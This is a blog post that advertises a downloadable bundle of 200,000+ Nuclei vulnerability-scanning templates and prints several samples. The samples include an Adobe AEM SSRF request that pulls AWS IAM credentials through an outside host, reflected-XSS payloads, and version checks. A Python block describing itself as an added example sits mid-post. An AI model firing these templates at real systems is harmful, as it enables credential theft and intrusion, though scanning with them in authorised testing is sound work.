1- YangCC's review
> Yes, 200,000+ Nuclei POCs, second to none.
> Extremely impressive.
> However, every POC is in YAML format; since this is Nuclei, tools that support YAML-format POCs can use them directly.
2- Category overview
Let's first look at the total count.
From here you can see that the collection holds 208,936 POCs in total.
Next, let's tally all the POC directories in the collection.
Figure 1
Figure 2
From Figure 1 and Figure 2 you can see that there are 80+ POC categories.
Browsing the directories shows many POC categories, including adobe, apache, aws, cisco, cnnvd, cnvd, ftp, zfuz, git, http, java, mysql, nginx, oracle, php, python, ruby, sql, ssh, web, vmware, xss and more.
Below we introduce a few of these categories.
3- Selected POCs
3.1 adobe
In terms of numbers, see the figure below: the total is 300+ POCs. Now let's take a quick look at a couple of them.
adobe/SSRF-AEM-2018-12809.yaml
```yaml
id: aws-key-extraction-ssrf

info:
  name: SSRF CVE-2018-12809
  author: x86rd
  severity: critical
  description: Checks for exposed AWS keys through SSRF vulnerability.
  tags: ssrf,aws,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}//libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.a.11.htm.svg?url=https://aws.osoro.zip/latest/meta-data/iam/security-credentials/ManagedServicesBigBearInstance&23/apil.omniture.com/a&q=a"
      - "{{BaseURL}}/app/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.a.11.htm.svg?url=http://aws.osoro.zip/latest/meta-data/iam/security-credentials/ManagedServicesBigBearInstance&23/apil.omniture.com/a&q=a"
      - "{{BaseURL}}/api/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.a.11.htm.svg?url=http://aws.osoro.zip/latest/meta-data/iam/security-credentials/ManagedServicesBigBearInstance&23/apil.omniture.com/a&q=a"
    headers:
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US, en; q=0.5
      Accept-Encoding: gzip, deflate
      DNT: "1"
      Connection: close
      Upgrade-Insecure-Requests: "1"

    matchers:
      - type: regex
        regex:
          - "AKIA[0-9A-Z]{16}"
          - "ASIA[0-9A-Z]{16}"
          - "AGPA[0-9A-Z]{16}"
        part: body
        condition: or
```
adobe/aem-security-users.yaml
```yaml
id: aem-security-users

info:
  name: Adobe AEM Security Users Exposure
  author: dhiyaneshDk
  severity: medium
  reference:
    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
  metadata:
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  tags: misconfig,aem,adobe,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/libs/granite/security/content/useradmin.html"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'AEM Security | Users'
          - 'trackingelement="create user"'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
Each file holds a different POC; we won't go through them one by one here. Those interested can browse them on their own.
3.2 nginx
In terms of numbers, see the figure below: the total is 100+ POCs.
Again, we'll pick a few at random and look at them.
nginx/nginx-version-9120.yaml
nginx/snipe-nginx-cache.yaml
```yaml
id: snipe-nginx-cache

info:
  name: >
    Cache Sniper for Nginx <= 1.0.4.2 - Missing Authorization
  author: topscoder
  severity: high
  description: >
  reference:
    - https://github.com/topscoder/nuclei-wordfence-cve
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/b8d0638e-06c5-4884-a14d-4b28ae3ef3f3?source=api-scan
  classification:
    cvss-metrics:
    cvss-score:
    cve-id:
  metadata:
    fofa-query: "wp-content/plugins/snipe-nginx-cache/"
    google-query: inurl:"/wp-content/plugins/snipe-nginx-cache/"
    shodan-query: 'vuln:'
  tags: cve,wordpress,wp-plugin,snipe-nginx-cache,high

http:
  - method: GET
    redirects: true
    max-redirects: 3
    path:
      - "{{BaseURL}}/wp-content/plugins/snipe-nginx-cache/readme.txt"

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        internal: true
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"

      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "snipe-nginx-cache"
        part: body

      - type: dsl
        dsl:
          - compare_versions(version, '<= 1.0.4.2')
```
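To show what this version-gated template actually decides, here is an added Python example (not part of the original post, the nuclei-wordfence-cve project or Nuclei itself) that replays its extractor and matchers against constructed readme.txt bodies. It assumes a simplified, purely numeric `compare_versions`; the real Nuclei DSL function has broader semver handling.

```python
import re

# Constructed sample readme.txt bodies for a WordPress plugin (not real plugin output)
VULNERABLE_README = "=== Cache Sniper for Nginx ===\nSlug: snipe-nginx-cache\nStable tag: 1.0.4.2\n"
PATCHED_README = "=== Cache Sniper for Nginx ===\nSlug: snipe-nginx-cache\nStable tag: 1.0.5\n"

# Same regex as the template's extractor; group 1 is the version string
STABLE_TAG_RE = re.compile(r"(?mi)Stable tag: ([0-9.]+)")


def extract_version(body):
    """Mimic the template's regex extractor (group: 1): return the version or None."""
    match = STABLE_TAG_RE.search(body)
    return match.group(1) if match else None


def _parse(version):
    """Dotted version -> tuple of ints, so '1.0.10' sorts after '1.0.9'."""
    return tuple(int(part) for part in version.split("."))


def compare_versions(version, constraint):
    """Evaluate one Nuclei-style constraint such as '<= 1.0.4.2'.
    Assumption: numeric dotted versions only, compared component-wise."""
    op, target = constraint.split()
    left, right = _parse(version), _parse(target)
    width = max(len(left), len(right))
    left += (0,) * (width - len(left))    # pad so that 1.0 == 1.0.0
    right += (0,) * (width - len(right))
    ops = {
        "<": left < right, "<=": left <= right, ">": left > right,
        ">=": left >= right, "==": left == right,
    }
    return ops[op]


def template_matches(status, body):
    """Replay the template's matchers (matchers-condition: and) on one response."""
    if status != 200:                      # type: status matcher
        return False
    if "snipe-nginx-cache" not in body:    # type: word matcher on the body
        return False
    version = extract_version(body)
    if version is None:                    # nothing extracted: the dsl matcher cannot fire
        return False
    return compare_versions(version, "<= 1.0.4.2")   # type: dsl matcher


if __name__ == "__main__":
    for label, body in (("vulnerable", VULNERABLE_README), ("patched", PATCHED_README)):
        print(label, "->", template_matches(200, body))
```

Running the same logic over your own plugin's readme.txt tells you whether a scanner built on this template would flag the install, and the version gate is what keeps a patched 1.0.5 from producing a false positive.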
From this you can also see that the number of POCs is substantial.
Next, let's look at another category.
3.3 xss
In terms of numbers, see the figure below: the total is 100+ POCs.
Very powerful.
We'll just pick one at random and look at it.
xss/zend-v1-xss.yaml
```yaml
id: zend-v1-xss

info:
  name: ZendFramework 1.12.2 - Cross-Site Scripting
  author: c3l3si4n
  severity: medium
  description: |
    ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
  reference:
    - https://twitter.com/c3l3si4n/status/1600035722148212737
  metadata:
    verified: true
    google-query: inurl:"/tests/Zend/Http/"
  tags: zend,zendframework,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>"
      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)>"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"redirection"]'
          - '"param"'
          - '<img/src=x onerror=alert(document.domain)'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
xss/wp-slideshow-xss-11572.yaml
```yaml
id: wp-slideshow-xss

info:
  name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  reference: https://www.exploit-db.com/exploits/37948
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
      # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
      # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
      # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
That's all for today's introduction. If you need a more detailed walkthrough, find my Bilibili channel and watch the related videos.
4- Download link
YangCC resource sharing site
Open the penetration-testing tools page.
Click the POC/EXP category.
Click "Nuclei POC 20W+" to download.
5- Closing remarks
For technical articles, remember to bookmark ycc77.com~
For resources, remember to bookmark ycc77.cn~
QQ group: 660264846
Bilibili: 疯狂的杨CC
Douyin: 疯狂的杨CC
Kuaishou: 疯狂的杨CC
WeChat official account: SGY安全
91: 疯狂的杨CC
p站: 疯狂的杨CC